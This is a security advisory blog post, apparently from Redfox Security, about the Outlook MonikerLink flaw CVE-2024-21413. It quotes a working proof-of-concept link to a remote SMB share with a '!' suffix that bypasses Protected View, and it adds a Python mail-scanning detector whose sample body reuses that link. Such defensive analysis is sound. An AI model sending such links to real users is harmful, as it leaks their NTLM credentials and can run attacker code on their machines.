A vulnerability in how Outlook handles certain hyperlinks has been disclosed, and it has been reported as exploited in the wild by threat actors. The issue is tracked as CVE-2024-21413 and carries a CVSS severity rating of 9.8 (Critical).
Microsoft patched it in its February 2024 Patch Tuesday release. If the vulnerability is successfully exploited, an attacker can have a file opened in editing mode rather than in Protected View, bypassing the Office Protected View safeguard.
The Check Point report states that Outlook opens a hyperlink beginning with http:// or https:// in Windows's default browser. For other registered URL protocols, such as the skype: protocol, clicking the hyperlink produces a security alert.
For the file:// protocol, however, Outlook displayed no warning dialog at all. Instead, the Windows Notification Center showed an error, and the resource the link pointed to was never accessed.
Had the file actually been retrieved from the remote share, there is a good chance the local NTLM credential information would have been exposed in the process.
By making a small modification to the file:// link, the resource can be accessed without the security restriction just described. In testing, the test.rtf file on the remote share could be accessed successfully with the link below:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
According to the researchers, the resource is fetched over the SMB protocol, and it is during this SMB exchange that the local NTLM credential information is leaked. The researchers also attempted to escalate this attack vector to arbitrary code execution.
The Moniker Link string drives the COM (Component Object Model) object "look up" mechanism on Windows: Outlook passes it to the ole32!MkParseDisplayName() API. According to Microsoft's Moniker API documentation, a moniker string that contains "!" is treated as a composite moniker.
The researchers used this composite moniker, a FileMoniker (\\10.10.111.111\test\test.rtf) followed by an ItemMoniker (something), to reach Microsoft Word: Windows resolves the file moniker and launches Word in the background as a COM server.
When the hyperlink is clicked, Word opens and parses test.rtf from the path "\\10.10.111.111\test\test.rtf". Because the attacker controls test.rtf, it can be modified further so that WINWORD.EXE ends up executing arbitrary code on the victim's machine.
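As an added example (not code from Check Point, Microsoft or the original post), the following Python scanner shows what a mail-filtering or detection rule for the link shape described above looks like. It pulls every href out of an HTML mail body, flags file:// links that point at a UNC path, and splits a "!"-bearing link into the FileMoniker and ItemMoniker parts that MkParseDisplayName() would see. The regular expression, the verdict names and the sample mail body are all assumptions constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Assumed shape of a MonikerLink-style href: a file: scheme, a UNC prefix,
# a remote host, a share/file path (the FileMoniker) and a "!" followed by
# the ItemMoniker. The pattern is this example's own, not Microsoft's.
UNC_MONIKER_RE = re.compile(
    r"""^file:/*               # file: scheme with any number of slashes
        [\\/]{2}               # UNC prefix (\\ or //)
        (?P<host>[^\\/!]+)     # remote host (IP address or name)
        [\\/](?P<path>[^!]*)   # share and file path = FileMoniker
        !(?P<item>.*)$         # "!" plus ItemMoniker = the bypass marker
    """,
    re.IGNORECASE | re.VERBOSE,
)


class HrefCollector(HTMLParser):
    """Collects href attribute values from <a> and <area> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("a", "area"):
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def classify_href(href):
    """Return a dict describing a suspicious file: link, or None if benign.

    'monikerlink' = UNC file link with a "!" item suffix (the bypass shape).
    'file_link'   = any other file: link; Outlook blocks these, but they are
                    still worth surfacing in a mail filter.
    """
    h = unquote(href.strip())
    m = UNC_MONIKER_RE.match(h)
    if m:
        host = m.group("host")
        path = m.group("path").replace("/", "\\")
        return {
            "href": href,
            "host": host,
            "file_moniker": "\\\\" + host + "\\" + path,
            "item_moniker": m.group("item"),
            "verdict": "monikerlink",
        }
    if h.lower().startswith("file:"):
        return {"href": href, "verdict": "file_link"}
    return None


def scan_html(body):
    """Return the list of suspicious links found in an HTML mail body."""
    collector = HrefCollector()
    collector.feed(body)
    return [c for c in (classify_href(h) for h in collector.hrefs) if c]


# Constructed sample mail body for this example (not a real captured message).
SAMPLE_MAIL = r"""<html><body>
<p>Quarterly report, please <a href="https://example.com/report">review</a>.</p>
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
<a href="file:///\\10.10.111.111\test\plain.rtf">old link</a>
<a href="skype:someone?call">Skype</a>
</body></html>"""


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_MAIL):
        print(finding)
```

A filter built on this would block or quarantine any 'monikerlink' hit and could feed the extracted host into a firewall or SMB egress rule; the 'file_link' verdict is informational, since Outlook already refuses those.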
According to Microsoft’s security vulnerability report for CVE-2024-21413, the following products have fixes available:
CVE-2024-21413 poses a severe risk to Microsoft Outlook users across platforms and versions. Any individual or organisation using Outlook for email communications could be exposed, so users need to recognise this threat quickly in order to protect themselves from attack.
CVE-2024-21413 is classified as a zero-day vulnerability, meaning that adversaries began exploiting it in the wild before the vendor was aware of it. Attackers could use it against unsuspecting users, who should therefore remain vigilant and take the necessary steps to reduce their exposure as quickly as possible.
Microsoft issued a security patch for Outlook addressing CVE-2024-21413 as part of its February 2024 Patch Tuesday updates. The update protects systems against exploitation attempts, and users should install it immediately.
Treat links in unfamiliar or unexpected emails with caution, and use email security tools capable of detecting and blocking malicious content; users should also be kept informed about zero-day vulnerabilities and cybersecurity best practices.
Zero-day vulnerabilities present a grave threat to digital infrastructure, as the MonikerLink vulnerability shows. Understanding their nature and implications, and how best to defend against zero-day attacks, is critical for individuals and organisations alike. Staying informed, implementing robust security measures and working closely with cybersecurity professionals are necessary to navigate the cyber threat landscape and reduce these risks.
Redfox Security is a diverse network of expert security consultants with a global mindset and a collaborative culture. If you are looking to improve your organization’s security posture, contact us today to discuss your security testing needs. Our team of security professionals can help you identify vulnerabilities and weaknesses in your systems and provide recommendations to remediate them.
©️2024 Redfox Cyber Security Inc. All rights reserved.